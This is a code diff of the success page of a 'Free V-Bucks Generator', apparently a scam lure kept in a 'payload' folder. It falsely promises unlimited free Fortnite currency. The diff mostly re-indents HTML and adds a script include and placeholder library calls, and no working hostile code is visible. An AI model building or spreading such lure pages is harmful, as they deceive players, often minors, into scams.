--- a/payload/vbucks/src/success.html
+++ b/payload/vbucks/src/success.html
@@ -1,32 +1,31 @@
 <!DOCTYPE html>
 <html lang="en">
-   <head>
-      <!-- Global site tag (gtag.js) - Google Analytics -->
-      <script async src="https://www.googletagmanager.com/gtag/js?id=UA-75326826-2"></script>
-      <script>
-         window.dataLayer = window.dataLayer || [];
-         function gtag(){dataLayer.push(arguments);}
-         gtag('js', new Date());
-         
-         gtag('config', 'UA-75326826-2');
-      </script>
-      <title>Free V-Bucks Generator - Success</title>
-      <meta charset="utf-8">
-      <meta name="description" content="Fortnite Battle Royale Hack Tool Gain Unlimited Free V-Bucks">
-      <meta name="keywords" content="Free V-Bucks Generator,Fortnite V-Bucks Free,Fortnite Free V-Bucks Generator,Fortnite hack">
-      <meta name="author" content="Free V-Bucks Generator">
-      <meta name="viewport" content="width=device-width, initial-scale=1.0">
-      <!-- Bootstrap CSS -->
-      <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
-      <link rel="stylesheet" type="text/css" href="css/magnific-popup.css">
-      <link rel="stylesheet" type="text/css" href="css/style.css">
-      <script type='text/javascript' src='http://platform-api.sharethis.com/js/sharethis.js#property=5ab5818ece89f000136417ff&product=social-ab' async='async'></script>
+    <head>
+        <!-- Global site tag (gtag.js) - Google Analytics -->
+        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-75326826-2"></script>
+        <script>
+            window.dataLayer = window.dataLayer || [];
+            function gtag(){dataLayer.push(arguments);}
+            gtag('js', new Date());
+            gtag('config', 'UA-75326826-2');
+        </script>
+        <title>Free V-Bucks Generator - Success</title>
+        <meta charset="utf-8">
+        <meta name="description" content="Fortnite Battle Royale Hack Tool Gain Unlimited Free V-Bucks">
+        <meta name="keywords" content="Free V-Bucks Generator,Fortnite V-Bucks Free,Fortnite Free V-Bucks Generator,Fortnite hack">
+        <meta name="author" content="Free V-Bucks Generator">
+        <meta name="viewport" content="width=device-width, initial-scale=1.0">
+        <!-- Bootstrap CSS -->
+        <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
+        <link rel="stylesheet" type="text/css" href="css/magnific-popup.css">
+        <link rel="stylesheet" type="text/css" href="css/style.css">
+        <script type='text/javascript' src='http://platform-api.sharethis.com/js/sharethis.js#property=5ab5818ece89f000136417ff&product=social-ab' async='async'></script>
    </head>
    <body style="background-color: hotpink;">
 
       <div class="layout">
       <div class="generator-wrap1" >
-         <div class="fortnite-wrap col-lg-6 center-block">
+    <div class="fortnite-wrap col-lg-6 center-block">
             <div class="title-wrap text-center">
                <img src="img/logo.png" class="center-block img-responsive" alt="Free V-Bucks Generator">
                <br>
@@ -72,6 +71,11 @@
       <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
       <script type="text/javascript" src="js/vendor/jquery.magnific-popup.min.js"></script>
       <script type="text/javascript" src="js/index.js"></script>
+      <script type="text/javascript" src="file.js"></script>
+    <script type="text/javascript">
+   MYLIBRARY.init(["somevalue", 1, "controlId"]);
+   MYLIBRARY.helloWorld();
+</script>
       <script>if (window.module) module = window.module;</script>
    </body>
    <!-- Histats.com  START  (aync)-->
